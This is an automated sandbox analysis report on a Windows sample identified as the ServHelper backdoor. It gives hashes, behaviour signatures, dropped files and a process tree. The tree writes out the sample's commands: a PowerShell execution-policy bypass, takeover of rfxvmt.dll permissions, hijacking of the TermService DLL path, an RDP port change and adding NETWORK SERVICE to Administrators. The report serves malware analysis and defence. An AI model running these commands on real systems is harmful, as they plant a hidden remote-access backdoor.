Analysis

  • max time kernel
    177s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2023 01:18

General

  • Target

    43a5e55b1251affee0cf7494ac9c63b4.exe

  • Size

    4.3MB

  • MD5

    43a5e55b1251affee0cf7494ac9c63b4

  • SHA1

    4a53bd2c188cf869b2a81b047940faf1ea03e1cb

  • SHA256

    e2b372effc4c426a1e63d2629bd565eabeeaf042b9e0aea11701e09f42921a3c

  • SHA512

    f1dde143fd0be1242a6d211770a60574929283e953262459f9898ac7822e0652aa7fe323fe1e3af36a6082587d36382e7e42d5a4dee74a111800027085e40343

  • SSDEEP

    98304:pkucM0/VMuGOcsqLpBX1P3Xhm6SrnsQ2BUotyFoAqae:EM0/COsX1k6AnsFBUQyFoAq

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe
    "C:\Users\Admin\AppData\Local\Temp\43a5e55b1251affee0cf7494ac9c63b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3820
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iukmoeqw\iukmoeqw.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB84F.tmp" "c:\Users\Admin\AppData\Local\Temp\iukmoeqw\CSC67B972D064344E698B4F151C5A6EC6E4.TMP"
          4⤵
            PID:4736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:948
        • C:\Windows\SysWOW64\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3504
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1948
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3700
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3140
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3680
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1372
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3964
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3724
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          3⤵
          • Sets DLL path for service in the registry
          • Modifies registry key
          PID:4256
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
          3⤵
            PID:4620
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            3⤵
              PID:4336
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2800
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1968
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1976
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4456
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                      PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                    PID:376
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start TermService
                      4⤵
                        PID:2216
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                      3⤵
                        PID:3104
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                        3⤵
                          PID:400
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      1⤵
                        PID:708
                      • C:\Windows\SysWOW64\net.exe
                        net start TermService
                        1⤵
                          PID:3248
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 start TermService
                            2⤵
                              PID:816

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Filesize

                            53KB

                            MD5

                            e2e6bbdcc5cb2b2a8e58e62380cbdeeb

                            SHA1

                            fd3b0bbf8d08573d022e54ceb111e4dfe93ff752

                            SHA256

                            2cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2

                            SHA512

                            82ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Filesize

                            54KB

                            MD5

                            e50a78bcc6d94a431add33b3aa6278d1

                            SHA1

                            0555eaf446d2645074c9e28b9f3c55b3ba1593c5

                            SHA256

                            4375b5155019e09c497714ea54366c719012ec54a22f446428fd2c0f5ca537c7

                            SHA512

                            b430652795d30a169ddb93e60fa0a0320a91ca61ecb4cead2d7156070a7ac78433a33cd07f211def5d97962673584c6a009d5a59a0eadb9d928417d960cb4945

                          • C:\Users\Admin\AppData\Local\Temp\RESB84F.tmp

                            Filesize

                            1KB

                            MD5

                            f5b39ca9de2196b4bbfae811bc8d32c1

                            SHA1

                            1a01cb264c9e4a3858d8a49211511a59ad993dfe

                            SHA256

                            26f30212d6f3b843aed6987488ef783e3537eda51acc0314010c3f78d23b68e7

                            SHA512

                            8b4cdf60b205454cd23bdb23fb9c43dc84df5eb5ac42d176ce5a6dec430d7942826baea8b959c8b18d8db406935dd70b4e9cfaeed32a6e858904a7fc63b76bbb

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qmaey1xa.buz.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                            Filesize

                            2.5MB

                            MD5

                            409a6b954cb72e2cc5b958d620eeb950

                            SHA1

                            21144dbef5b9c8284a1714fefe9595c1ac439b93

                            SHA256

                            c334f40272d4d0d9b4073b0b232dbdcbf35fcce921fba7048254260d3268dd8d

                            SHA512

                            c338beba5e43ce1d10ba636ceb7d72c106e5eff6a8272188734224e8269f5fda9bd9d08e0b6070dd7e78af19fd8cf7a2fd939452e9dd057fae5bb567cec58867

                          • C:\Users\Admin\AppData\Local\Temp\iukmoeqw\iukmoeqw.dll

                            Filesize

                            3KB

                            MD5

                            ca27847aaf169950129155ebefc342ce

                            SHA1

                            26f25227f47d3daadd09efc13dceae396fbd49ff

                            SHA256

                            ce9c436a6d2eb522fa9f97369baf26fb9af0d57cc1cb77b21fd0daab9db1d28d

                            SHA512

                            2b931a01e7d89a00f9bc087541c65df5b48ac6cf1ace091962543d02626272e35e59a97eec55d2ad641da25d64b4ee5d965ec61c3e3804f50501c76c36b17f94

                          • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                            Filesize

                            1KB

                            MD5

                            28d9755addec05c0b24cca50dfe3a92b

                            SHA1

                            7d3156f11c7a7fb60d29809caf93101de2681aa3

                            SHA256

                            abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                            SHA512

                            891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                          • C:\Windows\SysWOW64\rfxvmt.dll

                            Filesize

                            40KB

                            MD5

                            dc39d23e4c0e681fad7a3e1342a2843c

                            SHA1

                            58fd7d50c2dca464a128f5e0435d6f0515e62073

                            SHA256

                            6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                            SHA512

                            5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                          • \??\c:\Users\Admin\AppData\Local\Temp\iukmoeqw\CSC67B972D064344E698B4F151C5A6EC6E4.TMP

                            Filesize

                            652B

                            MD5

                            2cb7ec057e3f0d8b3654230fc3f095bd

                            SHA1

                            2d9c0d0ac3d56e5fce5396da256bd98344998499

                            SHA256

                            e9e08451928974ede243c12f786ec28ce82f6e66335774c8e3de58f74d0be97a

                            SHA512

                            2565104dcd9a14fc0866b5f7a86e13625d38e8c7be3703de4721fdc003968e826c69e849dabb6cfe7aed1d22b392ee3670c3a457edc58002e78f5089b8dd22fd

                          • \??\c:\Users\Admin\AppData\Local\Temp\iukmoeqw\iukmoeqw.0.cs

                            Filesize

                            424B

                            MD5

                            9f8ab7eb0ab21443a2fe06dab341510e

                            SHA1

                            2b88b3116a79e48bab7114e18c9b9674e8a52165

                            SHA256

                            e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                            SHA512

                            53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                          • \??\c:\Users\Admin\AppData\Local\Temp\iukmoeqw\iukmoeqw.cmdline

                            Filesize

                            369B

                            MD5

                            3109141cb0a53aa09b6bf61728f0701b

                            SHA1

                            52571713b45c17c39b3d5c0e16a0bd012a1f8ef7

                            SHA256

                            b4df7fcf0e9b28efc27f6c7c6c0290141507721f6893af5d73acfcb314eeb8b9

                            SHA512

                            fe6b9757c39bd2255ed182c9661be274f402da9f9de99bb014202a1354e07e0d1d61849162f33d7b9984c56fcd66d2ac77dcc208aca714e64f1ecc52d47fe217

                          • memory/948-132-0x00000000053B0000-0x00000000053C0000-memory.dmp

                            Filesize

                            64KB

                          • memory/948-131-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/948-142-0x00000000053B0000-0x00000000053C0000-memory.dmp

                            Filesize

                            64KB

                          • memory/948-144-0x00000000702B0000-0x00000000702FC000-memory.dmp

                            Filesize

                            304KB

                          • memory/948-143-0x000000007F460000-0x000000007F470000-memory.dmp

                            Filesize

                            64KB

                          • memory/1720-25-0x00000000027F0000-0x0000000002800000-memory.dmp

                            Filesize

                            64KB

                          • memory/1720-52-0x00000000027F0000-0x0000000002800000-memory.dmp

                            Filesize

                            64KB

                          • memory/1720-24-0x0000000005520000-0x0000000005586000-memory.dmp

                            Filesize

                            408KB

                          • memory/1720-23-0x00000000027F0000-0x0000000002800000-memory.dmp

                            Filesize

                            64KB

                          • memory/1720-67-0x00000000070F0000-0x000000000711C000-memory.dmp

                            Filesize

                            176KB

                          • memory/1720-31-0x00000000057B0000-0x0000000005B04000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1720-21-0x0000000004DF0000-0x0000000004E12000-memory.dmp

                            Filesize

                            136KB

                          • memory/1720-36-0x0000000005E30000-0x0000000005E4E000-memory.dmp

                            Filesize

                            120KB

                          • memory/1720-37-0x0000000005E60000-0x0000000005EAC000-memory.dmp

                            Filesize

                            304KB

                          • memory/1720-20-0x0000000004EF0000-0x0000000005518000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/1720-66-0x00000000027F0000-0x0000000002800000-memory.dmp

                            Filesize

                            64KB

                          • memory/1720-63-0x0000000004AD0000-0x0000000004AD8000-memory.dmp

                            Filesize

                            32KB

                          • memory/1720-18-0x0000000002800000-0x0000000002836000-memory.dmp

                            Filesize

                            216KB

                          • memory/1720-19-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/1720-46-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/1720-48-0x0000000006350000-0x000000000636A000-memory.dmp

                            Filesize

                            104KB

                          • memory/1720-47-0x0000000007480000-0x0000000007AFA000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/1720-51-0x00000000027F0000-0x0000000002800000-memory.dmp

                            Filesize

                            64KB

                          • memory/3716-69-0x0000000004C40000-0x0000000004C50000-memory.dmp

                            Filesize

                            64KB

                          • memory/3716-83-0x00000000702B0000-0x00000000702FC000-memory.dmp

                            Filesize

                            304KB

                          • memory/3716-103-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3716-102-0x0000000006E70000-0x0000000006E78000-memory.dmp

                            Filesize

                            32KB

                          • memory/3716-101-0x0000000006E80000-0x0000000006E9A000-memory.dmp

                            Filesize

                            104KB

                          • memory/3716-100-0x0000000006E40000-0x0000000006E54000-memory.dmp

                            Filesize

                            80KB

                          • memory/3716-99-0x0000000006E30000-0x0000000006E3E000-memory.dmp

                            Filesize

                            56KB

                          • memory/3716-98-0x0000000006DF0000-0x0000000006E01000-memory.dmp

                            Filesize

                            68KB

                          • memory/3716-97-0x0000000006EC0000-0x0000000006F56000-memory.dmp

                            Filesize

                            600KB

                          • memory/3716-96-0x0000000006C90000-0x0000000006C9A000-memory.dmp

                            Filesize

                            40KB

                          • memory/3716-68-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3716-95-0x0000000006AC0000-0x0000000006B63000-memory.dmp

                            Filesize

                            652KB

                          • memory/3716-82-0x0000000006A80000-0x0000000006AB2000-memory.dmp

                            Filesize

                            200KB

                          • memory/3716-81-0x000000007EEA0000-0x000000007EEB0000-memory.dmp

                            Filesize

                            64KB

                          • memory/3716-84-0x0000000070920000-0x0000000070C74000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/3716-94-0x0000000006A60000-0x0000000006A7E000-memory.dmp

                            Filesize

                            120KB

                          • memory/3820-1-0x0000000004CE0000-0x00000000050ED000-memory.dmp

                            Filesize

                            4.1MB

                          • memory/3820-5-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-42-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3820-22-0x00000000050F0000-0x00000000054F2000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/3820-39-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-10-0x0000000008C10000-0x0000000008CA2000-memory.dmp

                            Filesize

                            584KB

                          • memory/3820-40-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-11-0x0000000008D40000-0x0000000008D4A000-memory.dmp

                            Filesize

                            40KB

                          • memory/3820-12-0x00000000099A0000-0x0000000009A06000-memory.dmp

                            Filesize

                            408KB

                          • memory/3820-16-0x0000000004CE0000-0x00000000050ED000-memory.dmp

                            Filesize

                            4.1MB

                          • memory/3820-41-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-2-0x00000000050F0000-0x00000000054F2000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/3820-3-0x0000000008160000-0x0000000008564000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/3820-4-0x0000000000400000-0x0000000002F51000-memory.dmp

                            Filesize

                            43.3MB

                          • memory/3820-8-0x0000000008560000-0x0000000008B04000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/3820-7-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-6-0x0000000005610000-0x0000000005620000-memory.dmp

                            Filesize

                            64KB

                          • memory/3820-9-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4288-130-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4288-120-0x0000000070920000-0x0000000070C74000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/4288-119-0x00000000702B0000-0x00000000702FC000-memory.dmp

                            Filesize

                            304KB

                          • memory/4288-118-0x000000007FDC0000-0x000000007FDD0000-memory.dmp

                            Filesize

                            64KB

                          • memory/4288-115-0x00000000048E0000-0x00000000048F0000-memory.dmp

                            Filesize

                            64KB

                          • memory/4288-104-0x0000000074D20000-0x00000000754D0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4288-105-0x00000000048E0000-0x00000000048F0000-memory.dmp

                            Filesize

                            64KB